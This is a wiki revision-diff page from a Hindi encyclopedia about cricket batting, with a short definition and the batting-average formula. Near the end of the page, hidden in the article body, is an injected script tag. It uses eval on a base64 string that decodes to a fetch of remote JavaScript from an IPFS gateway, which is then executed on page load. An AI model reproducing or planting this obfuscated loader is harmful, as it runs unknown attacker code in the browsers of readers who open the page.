Difference between revisions of "बल्लेबाज़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Batting-Stance.jpg|thumb|बल्लेबाज़ी करने का तरीका]]
+
[[चित्र:Batting-Stance.jpg|thumb|बल्लेबाज़ी करने का तरीका|Batting Technique|180px]]
 
क्रिकेट के प्रशंसकों के लिए बल्लेबाज़ी [[क्रिकेट]] के सबसे रोमांचक भागों में से एक है। [[गेंद (क्रिकेट)|गेंद]] को बल्ले से मारने वाले खिलाड़ी को बल्लेबाज़ कहा जाता है और यह क्रिया या कला बल्लेबाज़ी कहलाती है।  
 
क्रिकेट के प्रशंसकों के लिए बल्लेबाज़ी [[क्रिकेट]] के सबसे रोमांचक भागों में से एक है। [[गेंद (क्रिकेट)|गेंद]] को बल्ले से मारने वाले खिलाड़ी को बल्लेबाज़ कहा जाता है और यह क्रिया या कला बल्लेबाज़ी कहलाती है।  
 
==बल्लेबाज़ी औसत==
 
==बल्लेबाज़ी औसत==
बल्लेबाज़ी औसत, क्रिकेट के खेल में एक महत्त्वपूर्ण आँकड़ा है जिसे बल्लेबाज़ द्वारा बनाये गये कुल रनों को उसके आउट होने की संख्या से भाग देकर प्राप्त किया जा सकता है।
+
बल्लेबाज़ी औसत, क्रिकेट के खेल में एक महत्त्वपूर्ण आँकड़ा है जिसे बल्लेबाज़ द्वारा बनाये गये कुल रनों को उसके आउट होने की संख्या से भाग देकर प्राप्त किया जा सकता है।\
'''बल्लेबाज़ी औसत = बल्लेबाज द्वारा बनाये गये रनों की संख्या / उस बल्लेबाज़ की आउट होने की संख्या'''
+
 
 +
'''बल्लेबाज़ी औसत = बल्लेबाज द्वारा बनाये गये रनों की संख्या / उस बल्लेबाज़ की आउट होने की संख्या'''<br />
 +
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 09:57, 3 August 2010

thumb|ballebazi karane ka tarika|Batting Technique|180px kriket ke prashansakoan ke lie ballebazi kriket ke sabase romaanchak bhagoan mean se ek hai. geand ko balle se marane vale khila di ko ballebaz kaha jata hai aur yah kriya ya kala ballebazi kahalati hai.

ballebazi ausat

ballebazi ausat, kriket ke khel mean ek mahattvapoorn aank da hai jise ballebaz dvara banaye gaye kul ranoan ko usake aut hone ki sankhya se bhag dekar prapt kiya ja sakata hai.\

ballebazi ausat = ballebaj dvara banaye gaye ranoan ki sankhya / us ballebaz ki aut hone ki sankhya


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh